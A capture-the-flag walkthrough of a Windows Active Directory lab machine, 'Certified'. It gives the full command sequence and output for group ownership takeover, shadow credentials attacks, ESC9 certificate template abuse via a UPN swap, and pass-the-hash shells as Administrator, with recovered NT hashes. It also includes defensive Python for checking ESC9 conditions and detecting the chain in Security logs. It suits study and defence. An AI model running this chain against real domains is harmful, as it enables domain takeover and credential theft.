Certified
Certified is a medium Windows machine created by . The user judith.mader has WriteOwner over the management group, so she can take ownership of it, grant herself WriteMembers and join it. The management group has GenericWrite over the management_svc account, which allows a shadow credentials attack (writing msDS-KeyCredentialLink) to recover that account's NT hash. management_svc in turn has GenericAll over ca_operator, which is abused the same way. ca_operator is a member of Certificate Service DCOM Access and can enroll in the CertifiedAuthentication template, which is vulnerable to ESC9; abusing it yields a certificate with the Administrator UPN and, through PKINIT, the Administrator NT hash.
OS: Windows
Difficulty: Medium
Points: 30
Released: 02-11-2024
Last updated: 15-03-2025
The following credentials are provided for the engagement: judith.mader / judith09
Starting with an nmap scan, which shows the usual Active Directory services of a domain controller (DNS, Kerberos, LDAP/LDAPS, SMB, WinRM). Note the clock skew of about +6h41m against our machine; it matters for Kerberos later.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.41
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-12 01:44 GMT
Nmap scan report for 10.10.11.41
Host is up (0.54s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-12 08:26:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-12T08:28:34+00:00; +6h41m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m57s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-12T08:27:52
|_ start_date: N/A
|_clock-skew: mean: 6h41m56s, deviation: 0s, median: 6h41m55s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.63 seconds
Add certified.htb and DC01.certified.htb to the /etc/hosts file (the trailing 0 in certified.htb0 in the nmap output is a rendering artefact of the LDAP domain string, not part of the domain name).
The given credentials authenticate over SMB, but judith.mader only has READ on the default IPC$, NETLOGON and SYSVOL shares, and nothing interesting is exposed there.
nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09' --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
The same credentials also work over LDAP, so nxc can be used as a BloodHound ingestor. Start neo4j first so the collected data can be imported afterwards.
sudo neo4j start
[sudo] password for dexter:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:5167). It is available at http://localhost:7474
There may be a short delay until the server is ready.
nxc ldap 10.10.11.41 -u 'judith.mader' -p 'judith09' --bloodhound --collection all --dns-server 10.10.11.41
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 [-] Account not found in the BloodHound database.
LDAP 10.10.11.41 389 DC01 Resolved collection methods: psremote, container, localadmin, session, dcom, rdp, acl, group, objectprops, trusts
LDAP 10.10.11.41 389 DC01 Done in 01M 24S
LDAP 10.10.11.41 389 DC01 Compressing output into /home/dexter/.nxc/logs/DC01_10.10.11.41_2025-03-12_062741_bloodhound.zip
Import the zip file into BloodHound. Two edges stand out:
WriteOwner: judith.mader has WriteOwner over the management group, so she can make herself its owner (e.g. with impacket-owneredit). As owner she implicitly gets WriteDacl and can change the group's DACL.
GenericWrite: the management group has GenericWrite over the management_svc user. That covers the msDS-KeyCredentialLink attribute, so a member of the group can perform a shadow credentials attack and recover management_svc's NT hash.
With judith.mader now the owner of management, grant her WriteMembers (AddMember) on the group with dacledit, after which she can add herself to it.
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'management' 'certified.htb'/'judith.mader':'judith09'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250312-095736.bak
[*] DACL modified successfully!
Once judith.mader is a member of management (added through the WriteMembers right granted above), the group's GenericWrite over management_svc lets us write a new KeyCredential into that account's msDS-KeyCredentialLink attribute with pywhisker. Authenticating with the matching certificate via PKINIT then yields a TGT, and Certipy's NT hash recovery (PKINIT U2U) gives us the account's NT hash without ever touching its password.
pywhisker -d certified.htb -u 'judith.mader' -p 'judith09' --target 'management_svc' --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a6bb0dbe-fdb4-3b10-bbd1-b21019d1812c
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: kr6ENKIe.pfx
[+] PFX exportiert nach: kr6ENKIe.pfx
[i] Passwort für PFX: CEuTw5XMnMn5lzMBmnx6
[+] Saved PFX (#PKCS12) certificate & key at path: kr6ENKIe.pfx
[*] Must be used with password: CEuTw5XMnMn5lzMBmnx6
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Authenticate with the exported PFX (renamed here to management_svc.pfx). pywhisker protected the file with the password printed above, and certipy 4.8 expects an unencrypted PFX, so strip the password first (certipy cert -pfx kr6ENKIe.pfx -password '...' -export -out management_svc.pfx) before running:
certipy auth -pfx management_svc.pfx -u management_svc -domain certified.htb -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
Note: if Kerberos fails with a "Clock skew too great" error (the nmap scan showed the DC running about 6h41m ahead of us), synchronise the clock with the DC using ntpdate.
sudo ntpdate 10.10.11.41
2025-03-12 17:30:26.803193 (+0000) +25198.918123 +/- 0.196661 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25198.918123
With management_svc's NT hash we can pass-the-hash over WinRM and get a shell as management_svc with evil-winrm.
evil-winrm -i 10.10.11.41 -u 'management_svc' -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>
BloodHound also shows that management_svc has GenericAll over the ca_operator user, i.e. full control of that account.
GenericAll includes write access to msDS-KeyCredentialLink, so the same shadow credentials attack yields ca_operator's NT hash. certipy shadow auto does the whole cycle in one go: add the KeyCredential, authenticate with it, recover the hash and restore the original attribute value.
certipy shadow auto -u 'management_svc@certified.htb' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6e487d2d-ee15-8946-8278-792278aac63d'
[*] Adding Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 9a469a712a9d77dd66d1706b81653aee
nxc smb 10.10.11.41 -u 'ca_operator' -H 9a469a712a9d77dd66d1706b81653aee
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:9a469a712a9d77dd66d1706b81653aee
BloodHound also shows that ca_operator is a member of Certificate Service DCOM Access. Members of that built-in group are allowed to connect to the enterprise's certification authorities, i.e. to submit enrollment requests over DCOM/RPC, which makes AD CS the next thing to enumerate.
certipy find -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -dc-ip 10.10.11.41 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250313021309_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250313021309_Certipy.txt'
[*] Saved JSON output to '20250313021309_Certipy.json'
{
"Certificate Authorities": {
"0": {
"CA Name": "certified-DC01-CA",
"DNS Name": "DC01.certified.htb",
"Certificate Subject": "CN=certified-DC01-CA, DC=certified, DC=htb",
"Certificate Serial Number": "36472F2C180FBB9B4983AD4D60CD5A9D",
"Certificate Validity Start": "2024-05-13 15:33:41+00:00",
"Certificate Validity End": "2124-05-13 15:43:41+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "CERTIFIED.HTB\\Administrators",
"Access Rights": {
"2": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"1": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"512": [
"CERTIFIED.HTB\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "CertifiedAuthentication",
"Display Name": "Certified Authentication",
"Certificate Authorities": [
"certified-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"NoSecurityExtension",
"AutoEnrollment",
"PublishToDs"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Server Authentication",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1000 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CERTIFIED.HTB\\operator ca",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CERTIFIED.HTB\\Administrator",
"Write Owner Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Dacl Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Property Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC9": "'CERTIFIED.HTB\\\\operator ca' can enroll and template has no security extension"
}
}
}
}
ESC9 (from Oliver Lyak's Certifried/ESC9 research, also summarised on HackTricks) needs three things. First, the template carries the CT_FLAG_NO_SECURITY_EXTENSION enrollment flag (certipy's NoSecurityExtension), so certificates issued from it lack the szOID_NTDS_CA_SECURITY_EXT SID extension that Windows added for strong certificate mapping. Second, the domain controller is not in full enforcement mode: StrongCertificateBindingEnforcement is 0 or 1 rather than 2 (or CertificateMappingMethods includes the UPN flag 0x4), so the KDC still maps a certificate to an account by the UPN in its SAN. Third, the attacker has GenericWrite (or equivalent) over some account that can enroll in the template, here ca_operator via management_svc. The "Certificate has no object SID" line certipy prints during the request below is that missing extension.
The attack is to set ca_operator's userPrincipalName to Administrator (the bare sAMAccountName, which avoids a collision with the real account's UPN, since UPNs must be unique), enroll as ca_operator, and afterwards restore the UPN so that the forged certificate's UPN resolves to the real Administrator account.
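To make the three conditions concrete, here is an added check (my own example, not Certipy's code) that evaluates them over the template JSON certipy printed above. The template dict is transcribed from that output; the DC registry values are supplied by hand, since Certipy cannot read them remotely, and the 0x80000 flag value is CT_FLAG_NO_SECURITY_EXTENSION from MS-CRTD. The remediated() helper shows the template as an admin would fix it.

```python
"""ESC9 precondition check over Certipy-style template output.

Added example for this writeup; it is not part of Certipy or of the box.
The sample template is transcribed from the `certipy find` JSON above.
The two DC registry values (StrongCertificateBindingEnforcement under
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc and CertificateMappingMethods
under HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\Schannel)
are passed in by hand because Certipy cannot read them remotely.
"""
import copy
from typing import Any, Dict, List

# msPKI-Enrollment-Flag bit CT_FLAG_NO_SECURITY_EXTENSION (MS-CRTD): the CA
# omits the szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) SID extension
# from certificates issued off this template.
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000
# CertificateMappingMethods bit that lets Schannel map a certificate by UPN.
CERT_MAPPING_UPN = 0x4
# Windows default for CertificateMappingMethods (S4U2Self variants only).
CERT_MAPPING_DEFAULT = 0x18

# Enrollment rights held by these principals are not an escalation.
PRIVILEGED = {"Administrator", "Administrators", "Domain Admins", "Enterprise Admins"}


def no_security_extension(enrollment_flag: Any) -> bool:
    """Accept Certipy's decoded name list or the raw LDAP integer."""
    if isinstance(enrollment_flag, int):
        return bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)
    return "NoSecurityExtension" in enrollment_flag


def low_priv_enrollers(template: Dict[str, Any]) -> List[str]:
    """Enrollment principals (DOMAIN\\name form) outside the privileged set."""
    rights = template["Permissions"]["Enrollment Permissions"]["Enrollment Rights"]
    return [p for p in rights if p.split("\\", 1)[-1] not in PRIVILEGED]


def esc9_blockers(template: Dict[str, Any], strong_binding: int,
                  mapping_methods: int = CERT_MAPPING_DEFAULT) -> List[str]:
    """Conditions still standing between a low-privileged enrollee and ESC9.

    An empty list means exploitable, given GenericWrite over one of the
    enrollers (an ACL question BloodHound answers, not a template one)."""
    blockers = []
    if not template.get("Enabled"):
        blockers.append("template is not published on a CA")
    if not no_security_extension(template.get("Enrollment Flag", [])):
        blockers.append("issued certificates carry the SID security extension")
    if not (template.get("Client Authentication") or template.get("Any Purpose")):
        blockers.append("no client-authentication EKU, so PKINIT will reject it")
    if template.get("Requires Manager Approval"):
        blockers.append("manager approval required")
    if template.get("Authorized Signatures Required", 0):
        blockers.append("issuance requires authorized signatures")
    if not low_priv_enrollers(template):
        blockers.append("only privileged principals can enroll")
    if strong_binding == 2 and not mapping_methods & CERT_MAPPING_UPN:
        blockers.append("DC is in full enforcement and does not map by UPN")
    return blockers


def is_esc9(template: Dict[str, Any], strong_binding: int,
            mapping_methods: int = CERT_MAPPING_DEFAULT) -> bool:
    return not esc9_blockers(template, strong_binding, mapping_methods)


def remediated(template: Dict[str, Any]) -> Dict[str, Any]:
    """The template with CT_FLAG_NO_SECURITY_EXTENSION cleared, which is the
    fix an admin applies to msPKI-Enrollment-Flag on the template object."""
    fixed = copy.deepcopy(template)
    flag = fixed["Enrollment Flag"]
    fixed["Enrollment Flag"] = (flag & ~CT_FLAG_NO_SECURITY_EXTENSION if isinstance(flag, int)
                                else [f for f in flag if f != "NoSecurityExtension"])
    return fixed


# Transcribed from the certipy output above (only the fields used here).
CERTIFIED_AUTHENTICATION: Dict[str, Any] = {
    "Template Name": "CertifiedAuthentication",
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollment Flag": ["NoSecurityExtension", "AutoEnrollment", "PublishToDs"],
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
        "CERTIFIED.HTB\\operator ca",
        "CERTIFIED.HTB\\Domain Admins",
        "CERTIFIED.HTB\\Enterprise Admins",
    ]}},
}

if __name__ == "__main__":
    cases = [("as found, default KDC (1)", CERTIFIED_AUTHENTICATION, 1),
             ("flag cleared", remediated(CERTIFIED_AUTHENTICATION), 1),
             ("KDC full enforcement (2)", CERTIFIED_AUTHENTICATION, 2)]
    for label, tpl, mode in cases:
        print(f"{label}: {'ESC9' if is_esc9(tpl, mode) else esc9_blockers(tpl, mode)}")
```

The same template stops being ESC9 either by clearing the flag on the template or by putting the KDC into full enforcement, which is why Microsoft's KB5014754 rollout matters as much as template hygiene; the raw integer path (0x80028 is exactly NoSecurityExtension | AutoEnrollment | PublishToDs) is there for anyone reading msPKI-Enrollment-Flag straight from LDAP rather than from Certipy.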
certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
Request the CertifiedAuthentication certificate as ca_operator. The issued certificate carries UPN Administrator in its SAN and, because of the NoSecurityExtension flag, no object SID, so nothing in it ties it back to ca_operator.
certipy req -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -ns 10.10.11.41 -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'DC01.certified.htb' at '10.10.11.41'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Restore ca_operator's UPN before using the certificate. If ca_operator still held the UPN Administrator, the KDC's UPN lookup would resolve the certificate back to ca_operator; with the original value restored, no account has that UPN, the KDC falls back to matching it against sAMAccountName, and that is the built-in Administrator.
certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
Now authenticate with the forged certificate. Because the DC is not in full enforcement mode (this would fail with StrongCertificateBindingEnforcement set to 2), the KDC issues a TGT for Administrator and Certipy recovers the NT hash from it:
certipy auth -pfx administrator.pfx -domain 'certified.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
evil-winrm -i 10.10.11.41 -u 'Administrator' -H 0d5b49608bbce1751f708748f67e2d34
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
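From the defender's side, the chain leaves three distinct traces in the DC's Security log: a third party writing msDS-KeyCredentialLink (event 5136), a UPN rewritten to another account's name (4738), and a certificate-based TGT request for that account shortly afterwards (4768 with its certificate fields populated). The following added example (mine, not from the box or any vendor) runs those three rules over constructed events that mirror the steps above; the directory snapshot, DNs and timestamps are made up for the example.

```python
"""Detection logic for the directory changes this chain leaves in the Security log.

Added example for this writeup; it is not from the box, Microsoft or any SIEM.
The events are constructed dicts keyed like the Windows Security event fields
of 5136 (directory service object modified; needs the Directory Service
Changes audit subcategory and a SACL on the objects), 4738 (user account
changed) and 4768 (TGT requested; the Cert* fields are populated only for
PKINIT logons). Directory snapshot and timestamps are made up for the example.
"""
from typing import Dict, List, Optional

KEY_CRED_ATTR = "msDS-KeyCredentialLink"
VALUE_ADDED = "%%14674"   # 5136 OperationType that renders as "Value Added"
PKINIT_WINDOW = 3600      # seconds from a UPN rewrite to the suspicious logon

# Constructed directory snapshot: sAMAccountName -> DN and UPN.
DIRECTORY: Dict[str, Dict[str, str]] = {
    "management_svc": {"dn": "CN=management service,CN=Users,DC=certified,DC=htb",
                       "upn": "management_svc@certified.htb"},
    "ca_operator": {"dn": "CN=operator ca,CN=Users,DC=certified,DC=htb",
                    "upn": "ca_operator@certified.htb"},
    "Administrator": {"dn": "CN=Administrator,CN=Users,DC=certified,DC=htb",
                      "upn": "Administrator@certified.htb"},
}


def account_for_dn(directory: Dict[str, Dict[str, str]], dn: str) -> Optional[str]:
    for sam, info in directory.items():
        if info["dn"].lower() == dn.lower():
            return sam
    return None


def shadow_credential_writes(events: List[dict], directory=DIRECTORY) -> List[str]:
    """5136: a KeyCredential added to an account by a different principal.
    Windows Hello / device provisioning writes an object's own link; a third
    party writing it is the shadow-credentials signature."""
    alerts = []
    for e in events:
        if (e["EventID"] != 5136 or e["AttributeLDAPDisplayName"] != KEY_CRED_ATTR
                or e["OperationType"] != VALUE_ADDED):
            continue
        target = account_for_dn(directory, e["ObjectDN"]) or e["ObjectDN"]
        if e["SubjectUserName"].lower() != target.lower():
            alerts.append(f"shadow credentials: {e['SubjectUserName']} added a "
                          f"KeyCredential on {target}")
    return alerts


def upn_hijacks(events: List[dict], directory=DIRECTORY) -> List[str]:
    """4738: userPrincipalName rewritten to another account's name (the ESC9 setup)."""
    alerts = []
    for e in events:
        if e["EventID"] != 4738 or e["UserPrincipalName"] == "-":
            continue
        new_upn = e["UserPrincipalName"].lower()
        local = new_upn.split("@", 1)[0]
        for sam, info in directory.items():
            if sam.lower() == e["TargetUserName"].lower():
                continue
            if local == sam.lower() or new_upn == info["upn"].lower():
                alerts.append(f"UPN hijack: {e['SubjectUserName']} set UPN of "
                              f"{e['TargetUserName']} to {e['UserPrincipalName']} "
                              f"(collides with {sam})")
    return alerts


def pkinit_after_upn_change(events: List[dict], window: int = PKINIT_WINDOW) -> List[str]:
    """4768 with certificate fields for an account whose name was just planted
    in someone else's UPN: the forged-certificate logon itself."""
    planted = [(e["TimeCreated"], e["UserPrincipalName"].split("@", 1)[0].lower(),
                e["TargetUserName"])
               for e in events if e["EventID"] == 4738 and e["UserPrincipalName"] != "-"]
    alerts = []
    for e in events:
        if e["EventID"] != 4768 or not e.get("CertThumbprint"):
            continue
        for when, name, changed in planted:
            delta = e["TimeCreated"] - when
            if e["TargetUserName"].lower() == name and 0 <= delta <= window:
                alerts.append(f"PKINIT logon as {e['TargetUserName']} {delta}s after "
                              f"{changed}'s UPN was set to it (issuer {e['CertIssuerName']})")
    return alerts


def detect(events: List[dict], directory=DIRECTORY) -> List[str]:
    return (shadow_credential_writes(events, directory)
            + upn_hijacks(events, directory)
            + pkinit_after_upn_change(events))


# Constructed events mirroring the chain above, plus one benign self-write.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": 1000, "SubjectUserName": "management_svc",
     "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": KEY_CRED_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "TimeCreated": 1100, "SubjectUserName": "ca_operator",   # benign
     "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": KEY_CRED_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 4738, "TimeCreated": 1200, "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "Administrator"},
    {"EventID": 4768, "TimeCreated": 1500, "TargetUserName": "Administrator",
     "CertIssuerName": "certified-DC01-CA", "CertSerialNumber": "07",
     "CertThumbprint": "constructed-thumbprint"},
    {"EventID": 4738, "TimeCreated": 1600, "SubjectUserName": "management_svc",   # revert
     "TargetUserName": "ca_operator", "UserPrincipalName": "ca_operator@certified.htb"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The revert of the UPN (the last event) is deliberately not flagged on its own; it is the earlier rewrite to another account's name, and the certificate logon that follows it, that carry the signal. Event 5136 only appears if auditing of directory service changes is enabled and the user objects have a SACL covering attribute writes, which is the first thing to verify before relying on the first rule.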
The user flag is in C:\Users\management_svc\Desktop\user.txt and the root flag in C:\Users\Administrator\Desktop\root.txt.
Certipy is the tool used above for enumerating AD CS and finding the vulnerable certificate template.